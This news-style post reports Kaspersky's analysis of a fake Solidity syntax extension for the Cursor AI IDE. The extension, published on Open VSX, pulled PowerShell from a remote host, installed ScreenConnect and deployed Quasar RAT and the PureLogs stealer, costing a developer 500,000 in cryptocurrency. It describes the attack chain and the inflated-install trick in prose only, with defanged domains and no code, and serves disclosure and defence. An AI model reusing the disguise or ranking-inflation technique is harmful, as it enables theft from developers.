Researchers from @kaspersky Lab have shared the results of their investigation into an incident involving a blockchain developer who fell victim to a scam. It turned out that a fake extension for the @cursor_ai IDE code editor infected devices with remote access tools and info stealers, which led to the theft of 500,000 in cryptocurrency from the mentioned developer. Cursor AI IDE is an AI-based development environment built on Microsoft’s Visual Studio Code. It includes support for Open VSX, an alternative to the Visual Studio Marketplace, allowing the installation of VSCode-compatible extensions to enhance the software's functionality. Notably, the victim's operating system was installed just a few days before the incident. Only the most essential and popular programs were loaded onto the infected device. However, it was reported that no antivirus software was installed, and free online services were used. After obtaining a disk image of the device and analyzing it, Kaspersky researchers discovered a malicious JavaScript file named extension.js located in the .cursor/extensions directory. The extension was called Solidity Language and was published in the Open VSX registry. It was claimed to be a syntax highlighting tool for working with Ethereum smart contracts. Despite masquerading as a legitimate Solidity syntax highlighting extension, the plugin actually executed a PowerShell script from a remote host, angelic[.]su, to download additional malicious payloads. The remote PowerShell script checked if ScreenConnect was already installed, and if not, it launched another script to install it. After that, the attackers gained full remote access to the developer's computer. Using ScreenConnect, they uploaded and executed VBScript files that were used to download additional payloads onto the device. The final attack script downloaded a malicious executable from archive[.]org, containing a loader known as VMDetector, which installed Quasar RAT (capable of executing commands on devices) and PureLogs stealer (which steals credentials and authentication cookies from web browsers, as well as cryptocurrency wallet data). According to Kaspersky Lab, Open VSX showed that the extension was downloaded 54,000 times before it was removed on July 2. However, researchers believe that the number of installations was artificially inflated to give it an appearance of legitimacy. The day after, the attackers published a nearly identical version called solidity, increasing the installation count of this extension to nearly two million. The attackers were able to boost their extension's ranking above legitimate ones in Open VSX search results by bypassing the algorithm and significantly inflating the installation numbers, which prompted the victim to install the malicious extension, mistaking it for a legitimate one. Researchers also found similar extensions in the Microsoft Visual Studio Code store under the names solaibot, among-eth, and blankebesxstnion, which also executed PowerShell scripts to install ScreenConnect and info stealers. Malicious open-source packages continue to pose a serious threat to the crypto industry and remain an attractive way for attackers to profit, as many projects today rely on open-source tools.